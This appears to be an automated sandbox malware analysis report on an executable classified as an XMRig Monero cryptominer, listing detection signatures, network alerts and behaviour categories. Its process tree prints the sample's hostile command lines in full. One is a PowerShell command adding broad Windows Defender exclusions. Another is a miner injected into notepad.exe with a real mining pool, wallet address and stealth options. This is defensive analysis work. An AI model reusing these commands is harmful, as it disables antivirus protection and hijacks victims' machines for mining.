Windows
Analysis Report
9d2h99wrj.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- 9d2h99wrj.exe (PID: 6848 cmdline:
"C:\Users\ user\Deskt op\9d2h99w rj.exe" MD5: 88848246CE109235A762FCD193210CAA) - conhost.exe (PID: 6896 cmdline:
"C:\Window s\System32 \conhost.e xe" "C:\Us ers\user\D esktop\9d2 h99wrj.exe " MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7124 cmdline:
"cmd" cmd /c powersh ell -Comma nd "Add-Mp Preference -Exclusio nPath @(($ pwd).path, $env:User Profile,$e nv:AppData ,$env:Temp ,$env:Syst emRoot,$en v:HomeDriv e,$env:Sys temDrive) -Force" & powershell -Command "Add-MpPre ference -E xclusionEx tension @( 'exe','dll ') -Force" & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7136 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6268 cmdline:
powershell -Command "Add-MpPre ference -E xclusionPa th @(($pwd ).path, $e nv:UserPro file,$env: AppData,$e nv:Temp,$e nv:SystemR oot,$env:H omeDrive,$ env:System Drive) -Fo rce" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 6644 cmdline:
powershell -Command "Add-MpPre ference -E xclusionEx tension @( 'exe','dll ') -Force" MD5: 04029E121A0CFA5991749937DD22A1D9) - notepad.exe (PID: 7112 cmdline:
C:\Windows /System32\ notepad.ex e --cinit- find-x -B --algo="rx /0" --asm= auto --cpu -memory-po ol=1 --ran domx-mode= auto --ran domx-no-rd msr --cuda -bfactor-h int=12 --c uda-bsleep -hint=100 --url=pool .hashvault .pro:443 - -user=46TN T2eMYP5X7V 1Kh4SRr8Z7 Qb1jsLm74T XDLNkb5M6V goazSKmN1k ydrrcZZ9eq TF7UYDH7Ns EbJFLfe7DD kAfK5Nc1VL K --pass=P aizley2019 --cpu-max -threads-h int=20 --c init-steal th-targets ="+iU/trnP CTLD3p+slb va5u4EYOS6 bvIPemCHGQ x2WRUcnFdo mWh6dhl5H5 KbQCjp6yCY lsFu5LR1mi 7nQAy56B+5 doUwurAPvC ael2sR/N4= " --cinit -idle-wait =5 --cinit -idle-cpu= 70 --cinit -stealth MD5: 27F71B12CB585541885A31BE22F61C83)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
| |
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
| |
Click to see the 57 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
| |
MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth |
| |
MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen |
| |
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
Click to see the 3 entries |
Bitcoin Miner |
---|
Source: | Author: Joe Security: |
System Summary |
---|
Source: | Author: EagleEye Team: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-12T14:19:08.414148+0100 | 2036289 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 57699 | 1.1.1.1 | 53 | UDP |
2025-01-12T14:20:10.875041+0100 | 2036289 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 51665 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-12T14:19:06.623850+0100 | 2826930 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 49730 | 80.240.16.67 | 443 | TCP |
- • AV Detection
- • Bitcoin Miner
- • Compliance
- • Networking
- • System Summary
- • Persistence and Installation Behavior
- • Hooking and other Techniques for Hiding and Protection
- • Malware Analysis System Evasion
- • Anti Debugging
- • HIPS / PFW / Operating System Protection Evasion
- • Language, Device and Operating System Detection
- • Lowering of HIPS / PFW / Operating System Security Settings
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Bitcoin Miner |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Binary string: |
Networking |
---|
Source: | Network Connect: | Jump to behavior | ||
Source: | Network Connect: | Jump to behavior |
Source: | ASN Name: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Code function: | 0_2_00401D58 | |
Source: | Code function: | 0_2_00401D18 | |
Source: | Code function: | 0_2_004019D8 | |
Source: | Code function: | 0_2_00401D98 | |
Source: | Code function: | 0_2_00401C98 |
Source: | File created: | Jump to behavior |
Source: | Dropped File: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Binary string: |
Persistence and Installation Behavior |
---|
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | System information queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior | ||
Source: | Network Connect: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
Source: | Thread created: | Jump to behavior |
Source: | NtCreateThreadEx: | Jump to behavior | ||
Source: | NtWriteVirtualMemory: | Jump to behavior | ||
Source: | NtProtectVirtualMemory: | Jump to behavior | ||
Source: | NtClose: | |||
Source: | NtAllocateVirtualMemory: | Jump to behavior |
Source: | Memory written: | Jump to behavior |
Source: | Thread register set: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
